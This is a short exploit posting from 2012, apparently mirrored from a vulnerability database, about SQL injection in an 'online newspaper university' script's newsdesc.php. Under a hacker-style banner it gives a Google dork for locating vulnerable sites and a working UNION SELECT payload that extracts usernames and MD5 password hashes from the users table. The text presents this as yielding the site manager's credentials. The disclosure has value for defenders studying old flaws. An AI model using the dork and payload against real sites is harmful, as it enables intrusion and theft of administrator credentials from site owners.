Lucene search
SecurityvulnsSECURITYVULNS:DOC:27975HistoryApr 23, 2012 - 12:00 a.m.
online newspaper university"newsdesc.php" SQL Injection Vulnerabilities
2012-04-2300:00:00
vulners.com
41
##################################################################
Title : online newspaper university "newsdesc.php" SQL Injection Vulnerabilities
Discovered By: CrAzY CrAcKeR
Home : Null
Email : [email protected]
date : 12/4/2012
d0rk:- inurl:"inurl:news/newsdesc.php"
##################################################################
##################################################################
±±±±±±±±±±+
–+CrAzY CrAcKeR±-
±±±±±±±±±±+
##################################################################
##################################################################
Example:-
[-] http://www.???.com/news/newsdesc.php?id=(sql)
[-] Injection code… ( 0+union+select+1,concat(username,0x3a,password),3,4,5,6%20FROM%20users%20-- )
[-] http://www.???.com/news/newsdesc.php?id=2+and+1=0+union+select+1,concat(username,0x3a,password),3,4,5,6%20FROM%20users%20–
[-] you see now password (md5) and the name of the site manager
####################################################################
Greeting to my friend "A7eb Alwrd"
####################################################################